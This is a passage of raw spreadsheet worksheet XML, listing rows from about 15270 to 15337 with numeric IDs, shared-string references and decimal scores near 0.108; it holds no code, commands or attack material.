        <v>1.0</v>
      </c>
      <c r="E15270" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15270" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15271" ht="15.75" customHeight="1">
      <c r="A15271" s="1">
        <v>9989.0</v>
      </c>
      <c r="B15271" s="2">
        <v>5.6976598E7</v>
      </c>
      <c r="C15271" s="2" t="s">
        <v>14729</v>
      </c>
      <c r="D15271" s="2">
        <v>1.0</v>
      </c>
      <c r="E15271" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15271" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15272" ht="15.75" customHeight="1">
      <c r="A15272" s="1">
        <v>12716.0</v>
      </c>
      <c r="B15272" s="2">
        <v>3.0865268E7</v>
      </c>
      <c r="C15272" s="2" t="s">
        <v>14730</v>
      </c>
      <c r="D15272" s="2">
        <v>1.0</v>
      </c>
      <c r="E15272" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15272" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15273" ht="15.75" customHeight="1">
      <c r="A15273" s="1">
        <v>14263.0</v>
      </c>
      <c r="B15273" s="2">
        <v>3.8390159E7</v>
      </c>
      <c r="C15273" s="2" t="s">
        <v>14731</v>
      </c>
      <c r="D15273" s="2">
        <v>1.0</v>
      </c>
      <c r="E15273" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15273" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15274" ht="15.75" customHeight="1">
      <c r="A15274" s="1">
        <v>15134.0</v>
      </c>
      <c r="B15274" s="2">
        <v>4.1914885E7</v>
      </c>
      <c r="C15274" s="2" t="s">
        <v>14732</v>
      </c>
      <c r="D15274" s="2">
        <v>1.0</v>
      </c>
      <c r="E15274" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15274" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15275" ht="15.75" customHeight="1">
      <c r="A15275" s="1">
        <v>20061.0</v>
      </c>
      <c r="B15275" s="2">
        <v>8445005.0</v>
      </c>
      <c r="C15275" s="2" t="s">
        <v>14733</v>
      </c>
      <c r="D15275" s="2">
        <v>1.0</v>
      </c>
      <c r="E15275" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15275" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15276" ht="15.75" customHeight="1">
      <c r="A15276" s="1">
        <v>23713.0</v>
      </c>
      <c r="B15276" s="2">
        <v>7182866.0</v>
      </c>
      <c r="C15276" s="2" t="s">
        <v>14734</v>
      </c>
      <c r="D15276" s="2">
        <v>1.0</v>
      </c>
      <c r="E15276" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15276" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15277" ht="15.75" customHeight="1">
      <c r="A15277" s="1">
        <v>24460.0</v>
      </c>
      <c r="B15277" s="2">
        <v>1.0944671E7</v>
      </c>
      <c r="C15277" s="2" t="s">
        <v>14735</v>
      </c>
      <c r="D15277" s="2">
        <v>1.0</v>
      </c>
      <c r="E15277" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15277" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15278" ht="15.75" customHeight="1">
      <c r="A15278" s="1">
        <v>49.0</v>
      </c>
      <c r="B15278" s="2">
        <v>1.0903235E7</v>
      </c>
      <c r="C15278" s="2" t="s">
        <v>14736</v>
      </c>
      <c r="D15278" s="2">
        <v>1.0</v>
      </c>
      <c r="E15278" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15278" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15279" ht="15.75" customHeight="1">
      <c r="A15279" s="1">
        <v>378.0</v>
      </c>
      <c r="B15279" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C15279" s="2" t="s">
        <v>14737</v>
      </c>
      <c r="D15279" s="2">
        <v>1.0</v>
      </c>
      <c r="E15279" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15279" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15280" ht="15.75" customHeight="1">
      <c r="A15280" s="1">
        <v>611.0</v>
      </c>
      <c r="B15280" s="2">
        <v>1.9416079E7</v>
      </c>
      <c r="C15280" s="2" t="s">
        <v>14738</v>
      </c>
      <c r="D15280" s="2">
        <v>1.0</v>
      </c>
      <c r="E15280" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15280" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15281" ht="15.75" customHeight="1">
      <c r="A15281" s="1">
        <v>1460.0</v>
      </c>
      <c r="B15281" s="2">
        <v>2.690009E7</v>
      </c>
      <c r="C15281" s="2" t="s">
        <v>14739</v>
      </c>
      <c r="D15281" s="2">
        <v>1.0</v>
      </c>
      <c r="E15281" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15281" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15282" ht="15.75" customHeight="1">
      <c r="A15282" s="1">
        <v>2602.0</v>
      </c>
      <c r="B15282" s="2">
        <v>3.4399726E7</v>
      </c>
      <c r="C15282" s="2" t="s">
        <v>14740</v>
      </c>
      <c r="D15282" s="2">
        <v>1.0</v>
      </c>
      <c r="E15282" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15282" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15283" ht="15.75" customHeight="1">
      <c r="A15283" s="1">
        <v>3446.0</v>
      </c>
      <c r="B15283" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C15283" s="2" t="s">
        <v>14741</v>
      </c>
      <c r="D15283" s="2">
        <v>1.0</v>
      </c>
      <c r="E15283" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15283" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15284" ht="15.75" customHeight="1">
      <c r="A15284" s="1">
        <v>3543.0</v>
      </c>
      <c r="B15284" s="2">
        <v>3.8706668E7</v>
      </c>
      <c r="C15284" s="2" t="s">
        <v>14742</v>
      </c>
      <c r="D15284" s="2">
        <v>1.0</v>
      </c>
      <c r="E15284" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15284" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15285" ht="15.75" customHeight="1">
      <c r="A15285" s="1">
        <v>3918.0</v>
      </c>
      <c r="B15285" s="2">
        <v>4.0552383E7</v>
      </c>
      <c r="C15285" s="2" t="s">
        <v>14743</v>
      </c>
      <c r="D15285" s="2">
        <v>1.0</v>
      </c>
      <c r="E15285" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15285" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15286" ht="15.75" customHeight="1">
      <c r="A15286" s="1">
        <v>3956.0</v>
      </c>
      <c r="B15286" s="2">
        <v>4.0679418E7</v>
      </c>
      <c r="C15286" s="2" t="s">
        <v>14744</v>
      </c>
      <c r="D15286" s="2">
        <v>1.0</v>
      </c>
      <c r="E15286" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15286" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15287" ht="15.75" customHeight="1">
      <c r="A15287" s="1">
        <v>4452.0</v>
      </c>
      <c r="B15287" s="2">
        <v>4.2404223E7</v>
      </c>
      <c r="C15287" s="2" t="s">
        <v>14745</v>
      </c>
      <c r="D15287" s="2">
        <v>1.0</v>
      </c>
      <c r="E15287" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15287" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15288" ht="15.75" customHeight="1">
      <c r="A15288" s="1">
        <v>4765.0</v>
      </c>
      <c r="B15288" s="2">
        <v>4.3432772E7</v>
      </c>
      <c r="C15288" s="2" t="s">
        <v>14746</v>
      </c>
      <c r="D15288" s="2">
        <v>1.0</v>
      </c>
      <c r="E15288" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15288" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15289" ht="15.75" customHeight="1">
      <c r="A15289" s="1">
        <v>4906.0</v>
      </c>
      <c r="B15289" s="2">
        <v>4.3921211E7</v>
      </c>
      <c r="C15289" s="2" t="s">
        <v>14747</v>
      </c>
      <c r="D15289" s="2">
        <v>1.0</v>
      </c>
      <c r="E15289" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15289" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15290" ht="15.75" customHeight="1">
      <c r="A15290" s="1">
        <v>6581.0</v>
      </c>
      <c r="B15290" s="2">
        <v>4.8936654E7</v>
      </c>
      <c r="C15290" s="2" t="s">
        <v>14748</v>
      </c>
      <c r="D15290" s="2">
        <v>1.0</v>
      </c>
      <c r="E15290" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15290" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15291" ht="15.75" customHeight="1">
      <c r="A15291" s="1">
        <v>6711.0</v>
      </c>
      <c r="B15291" s="2">
        <v>4.9250691E7</v>
      </c>
      <c r="C15291" s="2" t="s">
        <v>14749</v>
      </c>
      <c r="D15291" s="2">
        <v>1.0</v>
      </c>
      <c r="E15291" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15291" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15292" ht="15.75" customHeight="1">
      <c r="A15292" s="1">
        <v>7509.0</v>
      </c>
      <c r="B15292" s="2">
        <v>5.1403176E7</v>
      </c>
      <c r="C15292" s="2" t="s">
        <v>14750</v>
      </c>
      <c r="D15292" s="2">
        <v>1.0</v>
      </c>
      <c r="E15292" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15292" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15293" ht="15.75" customHeight="1">
      <c r="A15293" s="1">
        <v>7937.0</v>
      </c>
      <c r="B15293" s="2">
        <v>5.2596484E7</v>
      </c>
      <c r="C15293" s="2" t="s">
        <v>14751</v>
      </c>
      <c r="D15293" s="2">
        <v>1.0</v>
      </c>
      <c r="E15293" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15293" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15294" ht="15.75" customHeight="1">
      <c r="A15294" s="1">
        <v>8759.0</v>
      </c>
      <c r="B15294" s="2">
        <v>5.4571808E7</v>
      </c>
      <c r="C15294" s="2" t="s">
        <v>14752</v>
      </c>
      <c r="D15294" s="2">
        <v>1.0</v>
      </c>
      <c r="E15294" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15294" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15295" ht="15.75" customHeight="1">
      <c r="A15295" s="1">
        <v>9036.0</v>
      </c>
      <c r="B15295" s="2">
        <v>5.5046885E7</v>
      </c>
      <c r="C15295" s="2" t="s">
        <v>14753</v>
      </c>
      <c r="D15295" s="2">
        <v>1.0</v>
      </c>
      <c r="E15295" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15295" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15296" ht="15.75" customHeight="1">
      <c r="A15296" s="1">
        <v>9367.0</v>
      </c>
      <c r="B15296" s="2">
        <v>5.5689897E7</v>
      </c>
      <c r="C15296" s="2" t="s">
        <v>14754</v>
      </c>
      <c r="D15296" s="2">
        <v>1.0</v>
      </c>
      <c r="E15296" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15296" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15297" ht="15.75" customHeight="1">
      <c r="A15297" s="1">
        <v>9669.0</v>
      </c>
      <c r="B15297" s="2">
        <v>5.631061E7</v>
      </c>
      <c r="C15297" s="2" t="s">
        <v>14755</v>
      </c>
      <c r="D15297" s="2">
        <v>1.0</v>
      </c>
      <c r="E15297" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15297" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15298" ht="15.75" customHeight="1">
      <c r="A15298" s="1">
        <v>11223.0</v>
      </c>
      <c r="B15298" s="2">
        <v>2.0310135E7</v>
      </c>
      <c r="C15298" s="2" t="s">
        <v>14756</v>
      </c>
      <c r="D15298" s="2">
        <v>1.0</v>
      </c>
      <c r="E15298" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15298" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15299" ht="15.75" customHeight="1">
      <c r="A15299" s="1">
        <v>11953.0</v>
      </c>
      <c r="B15299" s="2">
        <v>2.5592286E7</v>
      </c>
      <c r="C15299" s="2" t="s">
        <v>14757</v>
      </c>
      <c r="D15299" s="2">
        <v>1.0</v>
      </c>
      <c r="E15299" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15299" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15300" ht="15.75" customHeight="1">
      <c r="A15300" s="1">
        <v>12623.0</v>
      </c>
      <c r="B15300" s="2">
        <v>3.0223746E7</v>
      </c>
      <c r="C15300" s="2" t="s">
        <v>14758</v>
      </c>
      <c r="D15300" s="2">
        <v>1.0</v>
      </c>
      <c r="E15300" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15300" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15301" ht="15.75" customHeight="1">
      <c r="A15301" s="1">
        <v>13134.0</v>
      </c>
      <c r="B15301" s="2">
        <v>3.3706729E7</v>
      </c>
      <c r="C15301" s="2" t="s">
        <v>14759</v>
      </c>
      <c r="D15301" s="2">
        <v>1.0</v>
      </c>
      <c r="E15301" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15301" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15302" ht="15.75" customHeight="1">
      <c r="A15302" s="1">
        <v>13779.0</v>
      </c>
      <c r="B15302" s="2">
        <v>3.6555872E7</v>
      </c>
      <c r="C15302" s="2" t="s">
        <v>14760</v>
      </c>
      <c r="D15302" s="2">
        <v>1.0</v>
      </c>
      <c r="E15302" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15302" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15303" ht="15.75" customHeight="1">
      <c r="A15303" s="1">
        <v>13966.0</v>
      </c>
      <c r="B15303" s="2">
        <v>3.7312502E7</v>
      </c>
      <c r="C15303" s="2" t="s">
        <v>14761</v>
      </c>
      <c r="D15303" s="2">
        <v>1.0</v>
      </c>
      <c r="E15303" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15303" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15304" ht="15.75" customHeight="1">
      <c r="A15304" s="1">
        <v>14022.0</v>
      </c>
      <c r="B15304" s="2">
        <v>3.7498785E7</v>
      </c>
      <c r="C15304" s="2" t="s">
        <v>14762</v>
      </c>
      <c r="D15304" s="2">
        <v>1.0</v>
      </c>
      <c r="E15304" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15304" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15305" ht="15.75" customHeight="1">
      <c r="A15305" s="1">
        <v>14726.0</v>
      </c>
      <c r="B15305" s="2">
        <v>4.0669225E7</v>
      </c>
      <c r="C15305" s="2" t="s">
        <v>14763</v>
      </c>
      <c r="D15305" s="2">
        <v>1.0</v>
      </c>
      <c r="E15305" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15305" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15306" ht="15.75" customHeight="1">
      <c r="A15306" s="1">
        <v>14845.0</v>
      </c>
      <c r="B15306" s="2">
        <v>4.1059879E7</v>
      </c>
      <c r="C15306" s="2" t="s">
        <v>14764</v>
      </c>
      <c r="D15306" s="2">
        <v>1.0</v>
      </c>
      <c r="E15306" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15306" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15307" ht="15.75" customHeight="1">
      <c r="A15307" s="1">
        <v>15129.0</v>
      </c>
      <c r="B15307" s="2">
        <v>4189211.0</v>
      </c>
      <c r="C15307" s="2" t="s">
        <v>14765</v>
      </c>
      <c r="D15307" s="2">
        <v>1.0</v>
      </c>
      <c r="E15307" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15307" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15308" ht="15.75" customHeight="1">
      <c r="A15308" s="1">
        <v>15899.0</v>
      </c>
      <c r="B15308" s="2">
        <v>4.4580466E7</v>
      </c>
      <c r="C15308" s="2" t="s">
        <v>14766</v>
      </c>
      <c r="D15308" s="2">
        <v>1.0</v>
      </c>
      <c r="E15308" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15308" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15309" ht="15.75" customHeight="1">
      <c r="A15309" s="1">
        <v>16667.0</v>
      </c>
      <c r="B15309" s="2">
        <v>4.7252722E7</v>
      </c>
      <c r="C15309" s="2" t="s">
        <v>14767</v>
      </c>
      <c r="D15309" s="2">
        <v>1.0</v>
      </c>
      <c r="E15309" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15309" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15310" ht="15.75" customHeight="1">
      <c r="A15310" s="1">
        <v>16807.0</v>
      </c>
      <c r="B15310" s="2">
        <v>4.7796443E7</v>
      </c>
      <c r="C15310" s="2" t="s">
        <v>14768</v>
      </c>
      <c r="D15310" s="2">
        <v>1.0</v>
      </c>
      <c r="E15310" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15310" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15311" ht="15.75" customHeight="1">
      <c r="A15311" s="1">
        <v>17365.0</v>
      </c>
      <c r="B15311" s="2">
        <v>4.9493811E7</v>
      </c>
      <c r="C15311" s="2" t="s">
        <v>14769</v>
      </c>
      <c r="D15311" s="2">
        <v>1.0</v>
      </c>
      <c r="E15311" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15311" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15312" ht="15.75" customHeight="1">
      <c r="A15312" s="1">
        <v>17394.0</v>
      </c>
      <c r="B15312" s="2">
        <v>4.962216E7</v>
      </c>
      <c r="C15312" s="2" t="s">
        <v>14770</v>
      </c>
      <c r="D15312" s="2">
        <v>1.0</v>
      </c>
      <c r="E15312" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15312" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15313" ht="15.75" customHeight="1">
      <c r="A15313" s="1">
        <v>17600.0</v>
      </c>
      <c r="B15313" s="2">
        <v>5.0344548E7</v>
      </c>
      <c r="C15313" s="2" t="s">
        <v>14771</v>
      </c>
      <c r="D15313" s="2">
        <v>1.0</v>
      </c>
      <c r="E15313" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15313" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15314" ht="15.75" customHeight="1">
      <c r="A15314" s="1">
        <v>17752.0</v>
      </c>
      <c r="B15314" s="2">
        <v>5.0700109E7</v>
      </c>
      <c r="C15314" s="2" t="s">
        <v>14772</v>
      </c>
      <c r="D15314" s="2">
        <v>1.0</v>
      </c>
      <c r="E15314" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15314" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15315" ht="15.75" customHeight="1">
      <c r="A15315" s="1">
        <v>17767.0</v>
      </c>
      <c r="B15315" s="2">
        <v>5.0741501E7</v>
      </c>
      <c r="C15315" s="2" t="s">
        <v>14773</v>
      </c>
      <c r="D15315" s="2">
        <v>1.0</v>
      </c>
      <c r="E15315" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15315" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15316" ht="15.75" customHeight="1">
      <c r="A15316" s="1">
        <v>20516.0</v>
      </c>
      <c r="B15316" s="2">
        <v>1.3074845E7</v>
      </c>
      <c r="C15316" s="2" t="s">
        <v>14774</v>
      </c>
      <c r="D15316" s="2">
        <v>1.0</v>
      </c>
      <c r="E15316" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15316" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15317" ht="15.75" customHeight="1">
      <c r="A15317" s="1">
        <v>20665.0</v>
      </c>
      <c r="B15317" s="2">
        <v>1.4341178E7</v>
      </c>
      <c r="C15317" s="2" t="s">
        <v>14775</v>
      </c>
      <c r="D15317" s="2">
        <v>1.0</v>
      </c>
      <c r="E15317" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15317" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15318" ht="15.75" customHeight="1">
      <c r="A15318" s="1">
        <v>21713.0</v>
      </c>
      <c r="B15318" s="2">
        <v>2.5482745E7</v>
      </c>
      <c r="C15318" s="2" t="s">
        <v>14776</v>
      </c>
      <c r="D15318" s="2">
        <v>1.0</v>
      </c>
      <c r="E15318" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15318" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15319" ht="15.75" customHeight="1">
      <c r="A15319" s="1">
        <v>24825.0</v>
      </c>
      <c r="B15319" s="2">
        <v>1.209867E7</v>
      </c>
      <c r="C15319" s="2" t="s">
        <v>14777</v>
      </c>
      <c r="D15319" s="2">
        <v>1.0</v>
      </c>
      <c r="E15319" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15319" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15320" ht="15.75" customHeight="1">
      <c r="A15320" s="1">
        <v>25219.0</v>
      </c>
      <c r="B15320" s="2">
        <v>1.3308406E7</v>
      </c>
      <c r="C15320" s="2" t="s">
        <v>14778</v>
      </c>
      <c r="D15320" s="2">
        <v>1.0</v>
      </c>
      <c r="E15320" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15320" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15321" ht="15.75" customHeight="1">
      <c r="A15321" s="1">
        <v>25314.0</v>
      </c>
      <c r="B15321" s="2">
        <v>1.3432386E7</v>
      </c>
      <c r="C15321" s="2" t="s">
        <v>14779</v>
      </c>
      <c r="D15321" s="2">
        <v>1.0</v>
      </c>
      <c r="E15321" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15321" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15322" ht="15.75" customHeight="1">
      <c r="A15322" s="1">
        <v>25581.0</v>
      </c>
      <c r="B15322" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C15322" s="2" t="s">
        <v>14775</v>
      </c>
      <c r="D15322" s="2">
        <v>1.0</v>
      </c>
      <c r="E15322" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15322" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15323" ht="15.75" customHeight="1">
      <c r="A15323" s="1">
        <v>28411.0</v>
      </c>
      <c r="B15323" s="2">
        <v>2.634102E7</v>
      </c>
      <c r="C15323" s="2" t="s">
        <v>14780</v>
      </c>
      <c r="D15323" s="2">
        <v>1.0</v>
      </c>
      <c r="E15323" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15323" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15324" ht="15.75" customHeight="1">
      <c r="A15324" s="1">
        <v>28856.0</v>
      </c>
      <c r="B15324" s="2">
        <v>2.9022938E7</v>
      </c>
      <c r="C15324" s="2" t="s">
        <v>14781</v>
      </c>
      <c r="D15324" s="2">
        <v>1.0</v>
      </c>
      <c r="E15324" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15324" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15325" ht="15.75" customHeight="1">
      <c r="A15325" s="1">
        <v>29032.0</v>
      </c>
      <c r="B15325" s="2">
        <v>3.011655E7</v>
      </c>
      <c r="C15325" s="2" t="s">
        <v>14782</v>
      </c>
      <c r="D15325" s="2">
        <v>1.0</v>
      </c>
      <c r="E15325" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15325" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15326" ht="15.75" customHeight="1">
      <c r="A15326" s="1">
        <v>29558.0</v>
      </c>
      <c r="B15326" s="2">
        <v>3.3163695E7</v>
      </c>
      <c r="C15326" s="2" t="s">
        <v>14783</v>
      </c>
      <c r="D15326" s="2">
        <v>1.0</v>
      </c>
      <c r="E15326" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15326" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15327" ht="15.75" customHeight="1">
      <c r="A15327" s="1">
        <v>29983.0</v>
      </c>
      <c r="B15327" s="2">
        <v>3.6106762E7</v>
      </c>
      <c r="C15327" s="2" t="s">
        <v>14784</v>
      </c>
      <c r="D15327" s="2">
        <v>1.0</v>
      </c>
      <c r="E15327" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15327" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15328" ht="15.75" customHeight="1">
      <c r="A15328" s="1">
        <v>31874.0</v>
      </c>
      <c r="B15328" s="2">
        <v>5285794.0</v>
      </c>
      <c r="C15328" s="2" t="s">
        <v>14785</v>
      </c>
      <c r="D15328" s="2">
        <v>1.0</v>
      </c>
      <c r="E15328" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15328" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15329" ht="15.75" customHeight="1">
      <c r="A15329" s="1">
        <v>32603.0</v>
      </c>
      <c r="B15329" s="2">
        <v>5820485.0</v>
      </c>
      <c r="C15329" s="2" t="s">
        <v>14786</v>
      </c>
      <c r="D15329" s="2">
        <v>1.0</v>
      </c>
      <c r="E15329" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15329" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15330" ht="15.75" customHeight="1">
      <c r="A15330" s="1">
        <v>32653.0</v>
      </c>
      <c r="B15330" s="2">
        <v>5888061.0</v>
      </c>
      <c r="C15330" s="2" t="s">
        <v>14787</v>
      </c>
      <c r="D15330" s="2">
        <v>1.0</v>
      </c>
      <c r="E15330" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15330" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="15331" ht="15.75" customHeight="1">
      <c r="A15331" s="1">
        <v>434.0</v>
      </c>
      <c r="B15331" s="2">
        <v>1.7012333E7</v>
      </c>
      <c r="C15331" s="2" t="s">
        <v>14788</v>
      </c>
      <c r="D15331" s="2">
        <v>1.0</v>
      </c>
      <c r="E15331" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15331" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15332" ht="15.75" customHeight="1">
      <c r="A15332" s="1">
        <v>1687.0</v>
      </c>
      <c r="B15332" s="2">
        <v>2.8441305E7</v>
      </c>
      <c r="C15332" s="2" t="s">
        <v>14789</v>
      </c>
      <c r="D15332" s="2">
        <v>1.0</v>
      </c>
      <c r="E15332" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15332" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15333" ht="15.75" customHeight="1">
      <c r="A15333" s="1">
        <v>3029.0</v>
      </c>
      <c r="B15333" s="2">
        <v>3.6439647E7</v>
      </c>
      <c r="C15333" s="2" t="s">
        <v>14790</v>
      </c>
      <c r="D15333" s="2">
        <v>1.0</v>
      </c>
      <c r="E15333" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15333" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15334" ht="15.75" customHeight="1">
      <c r="A15334" s="1">
        <v>5477.0</v>
      </c>
      <c r="B15334" s="2">
        <v>4.5723623E7</v>
      </c>
      <c r="C15334" s="2" t="s">
        <v>14791</v>
      </c>
      <c r="D15334" s="2">
        <v>1.0</v>
      </c>
      <c r="E15334" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15334" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15335" ht="15.75" customHeight="1">
      <c r="A15335" s="1">
        <v>7555.0</v>
      </c>
      <c r="B15335" s="2">
        <v>5.1535274E7</v>
      </c>
      <c r="C15335" s="2" t="s">
        <v>14792</v>
      </c>
      <c r="D15335" s="2">
        <v>1.0</v>
      </c>
      <c r="E15335" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15335" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15336" ht="15.75" customHeight="1">
      <c r="A15336" s="1">
        <v>10617.0</v>
      </c>
      <c r="B15336" s="2">
        <v>1.3757499E7</v>
      </c>
      <c r="C15336" s="2" t="s">
        <v>14793</v>
      </c>
      <c r="D15336" s="2">
        <v>1.0</v>
      </c>
      <c r="E15336" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15336" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15337" ht="15.75" customHeight="1">
      <c r="A15337" s="1">
        <v>11911.0</v>
      </c>
      <c r="B15337" s="2">
        <v>2.523752E7</v>
      </c>
      <c r="C15337" s="2" t="s">
        <v>14794</v>
      </c>
      <c r="D15337" s="2">
        <v>1.0</v>
      </c>
      <c r="E15337" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15337" s="2">
